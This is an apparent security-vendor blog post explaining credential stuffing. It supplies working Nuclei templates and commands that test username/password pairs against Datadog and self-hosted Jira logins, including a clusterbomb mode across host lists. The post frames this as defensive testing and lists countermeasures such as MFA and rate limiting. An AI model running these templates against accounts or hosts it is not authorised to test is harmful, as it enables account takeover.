Table of Contents
Authors
It's not breaking news that protecting sensitive user data and ensuring the security of online accounts has become more critical than ever. With an increasing number of data breaches and cyberattacks, understanding various attack methodologies and implementing effective countermeasures is of utmost importance. One such cyberattack technique is credential stuffing. In this blog post, we will explore credential stuffing in detail, discuss its implications, and provide a comprehensive guide on automating its detection and prevention using Nuclei templates.
What is Credential Stuffing?
Credential stuffing is a type of cyberattack in which attackers use large numbers of leaked usernames and passwords to gain unauthorized access to user accounts. By leveraging automated tools and scripts, attackers systematically attempt to log in to various websites and applications with these leaked usernames and passwords, hoping that some users have reused their credentials across multiple websites.
Credential stuffing poses significant risks to organizations, including unauthorized access to sensitive data, financial loss, longterm damage to organization reputation, and potential legal implications. These attacks can lead to data breaches, account takeovers, and identity theft; these all impact both the organization's operations and its customers. High-profile breaches due to credential stuffing have been suffered by companies such as Spotify, General Motors, PayPal, DraftKings and many more.
For individuals, credential stuffing can result in many people's worst nightmare: a loss of privacy that leads to compromised financial and personal information that can follow them for many years. A successful attack may allow cybercriminals to hijack user accounts, make fraudulent transactions, and potentially access other online services where the victim has reused the same credentials. This is why it is imperative for users to not reuse credentials; however, only 35% of users use a different password for every login.
Automating Credential Stuffing with Nuclei Templates
Nuclei is an open-source vulnerability scanner that, among other things, enables the automation of credential stuffing detection. By using nuclei templates, you can easily set up and configure Nuclei to detect and prevent credential stuffing attempts on your organization's websites and applications.
ProjectDiscovery has added multiple nuclei templates for credential-stuffing testing for various well-known services, and they will be extended to cover more with time. There are primarily two types of templates, one for cloud services and the other for self-hosted software instances. The difference between them is the hosting environment; self-hosted versions are more prone to attack than the cloud, as cloud versions are more strict about login attempts or can include additional security measures.
Credential-Stuffing Templates for Cloud Services
Here is an example of a cloud service credential stuffing template; specifically, a self-contained
template ( as the login endpoint is pre-defined for a cloud service) that checks for valid login on Datadog.
yaml
1id: datadog-login-check
2
3info:
4 name: Datadog Login Check
5 author: parthmalhotra, pdresearch
6 severity: critical
7 description: Checks for a valid datadog account.
8 reference:
9 - https://owasp.org/www-community/attacks/Credential_stuffing
10 tags: login-check,datadog,creds-stuffing
11
12self-contained: true
13requests:
14 - raw:
15 - |
16 GET https://app.datadoghq.com/account/login HTTP/1.1
17 Host: app.datadoghq.com
18
19 - |
20 POST https://app.datadoghq.com/account/login? HTTP/1.1
21 Host: app.datadoghq.com
22 Content-Type: application/x-www-form-urlencoded
23
24 _authentication_token={{auth_token}}&username={{username}}&password={{password}}
25
26
27 cookie-reuse: true
28 extractors:
29 - type: regex
30 name: auth_token
31 part: body
32 internal: true
33 group: 1
34 regex:
35 - "authentication_token": "(.*?)","
36
37 - type: dsl
38 dsl:
39 - username
40 - password
41
42 attack: pitchfork
43 matchers-condition: and
44 matchers:
45 - type: word
46 part: header
47 words:
48 - 'Set-Cookie: dogweb='
49
50 - type: status
51 status:
52 - 302
This template can be run using the following command :
bash
1nuclei -var username=testing@projectdiscovery.io -var password=test123 -t atlassian.yaml
Note that template requires two inputs from the user, the username/email and password, which is supplied using the -var
option.
Credential-Stuffing Templates for Self-Hosted Services:
As most organizations use self-hosted instances, we can also leverage nuclei templates to check credential validity; in this case, we would also need to provide the hostname/ip of the deployed instance; here is a nuclei template to check for email/password validity across a self-hosted version of a Jira instance:
yaml
1id: jira-login-check
2
3info:
4 name: Jira Login Check
5 author: parthmalhotra, pdresearch
6 severity: critical
7 description: Checks for valididity of username and password on self hosted Jira instance.
8 reference:
9 - https://owasp.org/www-community/attacks/Credential_stuffing
10 tags: login-check,atlassian,creds-stuffing,self-hosted
11
12requests:
13 - raw:
14 - |-
15 POST /rest/gadget/1.0/login HTTP/1.1
16 Host: {{Hostname}}
17 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
18 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
19 Connection: close
20
21 os_username={{username}}&os_password={{password}}
22
23 extractors:
24 - type: dsl
25 dsl:
26 - username
27 - password
28 attack: pitchfork
29 matchers-condition: and
30 matchers:
31 - type: word
32 part: body
33 words:
34 - '"loginSucceeded":true'
35 - type: status
36 status:
37 - 200
This template can be run using the following command:
bash
1nuclei -u https://jira.projectdiscovery.io/ -t jira.yaml -var username=testing@projectdiscovery.io -var password=test123
By default, Nuclei employs Pitchfork mode, which takes the first line from email.txt
as the username input and the first line from pass.txt
as the password parameter input. Both email.txt
and pass.txt
must have an equal number of entries, with email/password combinations aligned on the same line in both files. However, starting with Nuclei 2.8, the default behaviour can be overridden using the -at / -attack-type
CLI option. Specifying the attack-type
option as clusterbomb
enables convenient verification of weak credentials for a list of given email addresses across various services.
Assuming email.txt
contains:
cli
1email1@example.com
2email2@example.com
3email3@example.com
and pass.txt
contains:
cli
1password1
2password2
3password3
The command below will check credential validity by sequentially testing each email from email.txt
with all passwords in pass.txt
across different hosts stored in jira_hosts.txt
bash
1cat jira_host.txt | nuclei -var username=email.txt -var password=pass.txt -t jira.yaml -attack-type clusterbomb
In addition to these templates and others from the community, developing your own customized target-specific templates for internal/custom portals can yield even more comprehensive results.
Extending Credential Stuffing Coverage
To increase the coverage of cloud service credential stuffing templates, you can take the reference websites from the token-spray and osint directories of the nuclei-templates project. Similarly, the exposed-panels and default-logins directory is a good resources for references to create credential-stuffing templates of self-hosted panels.
Strategies for Improving Detection and Prevention
To further enhance your organization's protection against credential stuffing, consider implementing the following strategies:
- Employ multi-factor authentication (MFA) for logins.
- Regularly monitor and analyze login attempts for patterns indicative of credential stuffing.
- Educate users about the importance of using strong, unique passwords and avoiding password reuse.
- Implement rate limiting and CAPTCHA mechanisms to thwart automated login attempts.
- Utilize threat intelligence feeds to stay informed about the latest credential leaks and breaches.
- Automate weak credential detection across your portals by using Nuclei in your security pipeline.
Conclusion
Credential stuffing is a significant threat to organizations and individuals alike, but by understanding the risks and implications associated with credential stuffing and leveraging self-contained Nuclei templates, organizations can automate the detection and prevention of these attacks. Furthermore, sharing these templates with the cybersecurity community offers numerous benefits, including faster threat identification, improved mitigation strategies, and enhanced cooperation between organizations and security professionals.
By fostering a culture of collaboration and continuous improvement, the cybersecurity community can work together to stay ahead of the curve and develop more effective countermeasures against credential-stuffing attacks. Ultimately, this collective defense approach contributes to a safer and more secure digital landscape for all.
What's Next?
Coming soon from ProjectDiscovery is PasswordX, a CLI-based open source project to quickly generate email:password
combinations based on a given email(s) or domain(s) list. It's designed to handle the common human tendency of creating predictable, pattern-based passwords. The idea is to feed these generated patterns directly into Nuclei's credential-stuffing templates in order to make detection of these credentials even more powerful. This can also be used to automate credential stuffing testing in the pipeline. Stay tuned to our Discord and Twitter as well as our Newsletter for more information in the future!
- Parth Malhotra @ ProjectDiscovery Research